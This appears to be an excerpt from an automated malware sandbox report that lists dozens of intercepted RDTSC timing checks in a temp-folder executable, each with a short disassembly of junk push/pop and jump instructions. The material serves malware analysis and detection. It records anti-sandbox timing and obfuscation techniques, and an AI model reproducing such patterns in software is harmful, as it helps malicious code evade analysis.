Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AEC24 second address: 4AEC3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CC44213h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AEDA8 second address: 4AEDAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AF025 second address: 4AF02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AF02B second address: 4AF04A instructions: 0x00000000 rdtsc 0x00000002 je 00007F742CEB81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F742CEB81CFh 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AF04A second address: 4AF07A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F742CC44206h 0x00000008 je 00007F742CC44206h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 jnp 00007F742CC44229h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F742CC44217h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AF07A second address: 4AF07E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4694B8 second address: 4694BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4694BC second address: 469517 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007F742CEB81D2h 0x00000012 jmp 00007F742CEB81CEh 0x00000017 pop edi 0x00000018 lea eax, dword ptr [ebp+124801B2h] 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F742CEB81C8h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 push eax 0x00000039 push ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4695C9 second address: 4695CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 469A0C second address: 469A23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 469A23 second address: 469A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F742CC44206h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 469A38 second address: 469A42 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F742CEB81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 469A42 second address: 469A50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CC4420Ah 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 469B17 second address: 469B21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F742CEB81C6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 50E02A second address: 50E031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 50E031 second address: 50E04F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F742CC44212h 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F742CC44206h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 50E04F second address: 50E053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 50E053 second address: 50E076 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44213h 0x00000007 jg 00007F742CC44206h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 50F647 second address: 50F6B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F742CEB81D2h 0x00000010 jmp 00007F742CEB81D4h 0x00000015 jmp 00007F742CEB81D5h 0x0000001a popad 0x0000001b jmp 00007F742CEB81D5h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F742CEB81CCh 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 51609E second address: 5160A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 5160A9 second address: 5160AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 5160AD second address: 5160C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F742CC44210h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 5160C9 second address: 5160D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F742CEB81CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 5160D6 second address: 5160E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 5160E0 second address: 5160F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F742CEB81C6h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 514961 second address: 514997 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F742CC44212h 0x00000008 jmp 00007F742CC44217h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F742CC4421Eh 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 514997 second address: 51499F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 51499F second address: 5149A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 514F3E second address: 514F47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 514F47 second address: 514F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F742CC44206h 0x0000000f ja 00007F742CC44206h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 514F5C second address: 514F62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 519EA9 second address: 519EC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44216h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 53A26B second address: 53A281 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F742CEB81CAh 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 426087 second address: 42608F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 426080 second address: 426087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 53C1C3 second address: 53C205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CC44211h 0x00000009 jmp 00007F742CC44211h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F742CC44219h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 53BF16 second address: 53BF1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 53BF1A second address: 53BF24 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F742CC44206h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 5573A0 second address: 5573B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CEB81D2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 556201 second address: 556208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55635C second address: 556362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 556362 second address: 55637D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CC44210h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55637D second address: 556381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 556381 second address: 55638F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F742CC44206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55638F second address: 556393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 556504 second address: 55650A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 5567CF second address: 5567EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CEB81D8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 5567EB second address: 5567F0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55703B second address: 55703F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55703F second address: 55704A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 558AD9 second address: 558B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jno 00007F742CEB81C6h 0x0000000c push edx 0x0000000d pop edx 0x0000000e jnp 00007F742CEB81C6h 0x00000014 jc 00007F742CEB81C6h 0x0000001a popad 0x0000001b jmp 00007F742CEB81D4h 0x00000020 popad 0x00000021 pushad 0x00000022 push ebx 0x00000023 jmp 00007F742CEB81D9h 0x00000028 pop ebx 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 558B28 second address: 558B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55B5A2 second address: 55B5A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55B697 second address: 55B6A8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F742CC44206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55B87F second address: 55B887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55B887 second address: 55B88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55BB21 second address: 55BB6B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push dword ptr [ebp+122D2F99h] 0x0000000e call 00007F742CEB81D0h 0x00000013 mov dx, 5F92h 0x00000017 pop edx 0x00000018 call 00007F742CEB81C9h 0x0000001d jno 00007F742CEB81D4h 0x00000023 push eax 0x00000024 jc 00007F742CEB81D0h 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55BB6B second address: 55BB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F742CC44219h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55BB93 second address: 55BBB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55BBB0 second address: 55BBB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55EC21 second address: 55EC58 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F742CEB81C6h 0x00000009 jmp 00007F742CEB81D5h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jc 00007F742CEB81E6h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F742CEB81CEh 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55EC58 second address: 55EC5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55EC5C second address: 55EC62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10EBE second address: 4C10EDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10EDB second address: 4C10F0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edx, ax 0x00000010 jmp 00007F742CEB81D4h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10F0C second address: 4C10F12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10F12 second address: 4C10F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10F16 second address: 4C10F1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10F1A second address: 4C10F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F742CEB81D6h 0x0000000f mov eax, 42C3B991h 0x00000014 pop esi 0x00000015 mov cx, bx 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F742CEB81CFh 0x00000021 jmp 00007F742CEB81D3h 0x00000026 popfd 0x00000027 mov si, 25CFh 0x0000002b popad 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f movzx esi, di 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F742CEB81D3h 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C60028 second address: 4C6002E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C6002E second address: 4C60032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF00B4 second address: 4BF00BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF00BA second address: 4BF00BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF00BE second address: 4BF0177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F742CC44219h 0x0000000f jmp 00007F742CC44210h 0x00000014 pop ecx 0x00000015 mov eax, edi 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F742CC44213h 0x00000020 xor si, 4B1Eh 0x00000025 jmp 00007F742CC44219h 0x0000002a popfd 0x0000002b push esi 0x0000002c mov si, dx 0x0000002f pop edx 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 jmp 00007F742CC44216h 0x00000038 push dword ptr [ebp+04h] 0x0000003b jmp 00007F742CC44210h 0x00000040 push dword ptr [ebp+0Ch] 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F742CC44217h 0x0000004a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF01B7 second address: 4BF01BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF01BD second address: 4BF01C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF01C3 second address: 4BF01C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10B9F second address: 4C10BCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F742CC4420Dh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10BCC second address: 4C10BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10BD2 second address: 4C10BD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10BD6 second address: 4C10C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F742CEB81D4h 0x00000010 jmp 00007F742CEB81D5h 0x00000015 popfd 0x00000016 jmp 00007F742CEB81D0h 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10C23 second address: 4C10C27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10C27 second address: 4C10C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10C2D second address: 4C10C33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10C33 second address: 4C10C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
